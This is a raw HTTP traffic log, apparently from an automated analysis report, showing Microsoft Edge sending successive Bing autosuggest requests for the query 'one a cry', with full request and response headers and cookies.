set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=A7CE403CAF684C56849D10DA1920A378&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=0E71753757FC6A4E0DD8602C56536B8D; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199015.1490c02e
GET

https://www.bing.com/qbox?query=one&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=8bfb0f52140a49759b720e816e67319c&oit=1&cp=3&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=8bfb0f52140a49759b720e816e67319c&oit=1&cp=3&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 432
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117ba7a3d14be084cd4a26bfbc6a7e
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-84zms4XHj0/zbcT4W/I8FdRuSmBbJKfchfZtMSvxdWs='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:35 GMT
set-cookie: MUID=2682F29A1EC168553CCFE7811F6E694D; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2682F29A1EC168553CCFE7811F6E694D; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=3B47CF1ED24E62E81D3EDA05D3E163B1; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=95F7972011C145BE8FDCB8A6BB396F7A&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=3B47CF1ED24E62E81D3EDA05D3E163B1; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199015.1490c177
GET

https://www.bing.com/qbox?query=one+&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=1aff0d625f8046e9bee98c945dae8c01&oit=1&cp=4&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=1aff0d625f8046e9bee98c945dae8c01&oit=1&cp=4&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 310
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117ba772df46d09352a2d865c4da74
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-q9wLbBHhCrU5BYmxITI39BLaG+AIsyiMjRZSBIE/5gU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:36 GMT
set-cookie: MUID=24F6734627F06E7834B9665D266C6F85; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=24F6734627F06E7834B9665D266C6F85; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=03F8F622864E65F3173DE33987D26415; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=FF2496626E5D4AAC9070E692F3F1503A&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:35 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=03F8F622864E65F3173DE33987D26415; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199015.1490c456
GET

https://www.bing.com/qbox?query=one+a&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=5a9194d7e37846c38d5ce23ab5ea435f&oit=4&cp=5&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=5a9194d7e37846c38d5ce23ab5ea435f&oit=4&cp=5&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 309
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117ba8342f43cc8b6906eb0f630371
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-QA2LhJGTxf90QN+IBTqKDdBuJBh58lkn8f6AgsL7p+E='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:36 GMT
set-cookie: MUID=1A40AFA5BEB761733153BABEBF6E6033; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:36 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=1A40AFA5BEB761733153BABEBF6E6033; expires=Tue, 11-Nov-2025 21:03:36 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=051B3F94A2566B8F39D92A8FA38F6A61; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:36 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:36 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:36 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=6EB626976DA94AE9AF21768A13BD360C&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:36 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:36 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:36 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=051B3F94A2566B8F39D92A8FA38F6A61; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199016.1490c713
GET

https://www.bing.com/qbox?query=one+a+&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=6aeb459c4dc942e09bf7cba6676cd3f2&oit=4&cp=6&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=6aeb459c4dc942e09bf7cba6676cd3f2&oit=4&cp=6&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 333
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117ba91dab4a5a8420f285a919af21
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-fkLj1Zwv50fUWk5bl1vK1r69kPRaqTIC6BTXHNilUsU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:37 GMT
set-cookie: MUID=14244B54BAB36A3A17E65E4FBB0E6BA6; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=14244B54BAB36A3A17E65E4FBB0E6BA6; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=2FFC353DE47264082EB32026E5CF6596; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=BB25325B62B04239B1BA4924DDD54B5A&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=2FFC353DE47264082EB32026E5CF6596; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199016.1490cdfd
GET

https://www.bing.com/qbox?query=one+a+c&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=e6a7dc39f6e64370a980e46857887d18&oit=4&cp=7&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+c&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=e6a7dc39f6e64370a980e46857887d18&oit=4&cp=7&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 320
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117ba91bed4f3f928acca43be51e8a
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-pBrqVVkDnXD+MSrcfFqZ2AmcgmiDizjDn5ObeSH8FQs='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:37 GMT
set-cookie: MUID=3E1C4392518A6FBA1BE4568950626ED0; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=3E1C4392518A6FBA1BE4568950626ED0; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=28B9FC0A83A06E810B62E91182486F90; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=6B350C1ECD4D4398993652F681544C01&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=28B9FC0A83A06E810B62E91182486F90; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199017.1490d037
GET

https://www.bing.com/qbox?query=one+a+cr&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=791ef0218576488381a713f4aba40517&oit=4&cp=8&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cr&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=791ef0218576488381a713f4aba40517&oit=4&cp=8&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 406
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117ba9133b4f5f9e1857e4e7901f50
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-imrWRA3aAbIUwWYzS4zm0C4srHpmcd+3RKGMKlRH4AA='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:37 GMT
set-cookie: MUID=2044C952795266252D5ADC4978BA673F; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2044C952795266252D5ADC4978BA673F; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=04DE2C7B771169210BBE396076F96805; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=B9B44C8C905047D99E42AFF3098D8F62&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:37 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=04DE2C7B771169210BBE396076F96805; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199017.1490d2fc
GET

https://www.bing.com/qbox?query=one+a+cry&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=52c7ed0b5d7441829bc1a37d4f480692&oit=4&cp=9&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cry&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=52c7ed0b5d7441829bc1a37d4f480692&oit=4&cp=9&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 391
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bac84924e16a3b139106896cdc9
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-mv6euZ1/pL75nG96hXWTcR06fafYnW3v9un0g18xA5c='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:40 GMT
set-cookie: MUID=293645E62176633C0B5550FD20876254; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=293645E62176633C0B5550FD20876254; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=18553A570903612A3E2A2F4C08F26077; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=50C288ED224B4DE4AD5587B18B099018&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20241017; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=18553A570903612A3E2A2F4C08F26077; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199020.1490e636
GET

https://www.bing.com/qbox?query=one+a+cry+&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=13c0d78c1f5340eeaa0e4f27de5be502&oit=4&cp=10&pgcl=4

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /qbox?query=one+a+cry+&language=en-US&pt=EdgBox&cvid=417d8ed58c6f4a18b27e5c161d0ffe7f&ig=13c0d78c1f5340eeaa0e4f27de5be502&oit=4&cp=10&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 335
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bac3936405c8062667dae34f97b
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ST6J6fYditz3kBLsmeCxp1d+dqLZ+tYazCr7CgmTz50='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:03:40 GMT
set-cookie: MUID=37B2F050BB5767B31E3FE54BBA2F6606; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=37B2F050BB5767B31E3FE54BBA2F6606; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=0188C35E2CB764F1179BD6452DCF6544; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=CE240DC19C4A485F92E43E11D0FE1F4F&dmnchg=1; domain=.bing.com; expires=Tue, 11-Nov-2025 21:03:40 GMT; path=/; secure; SameSite=None
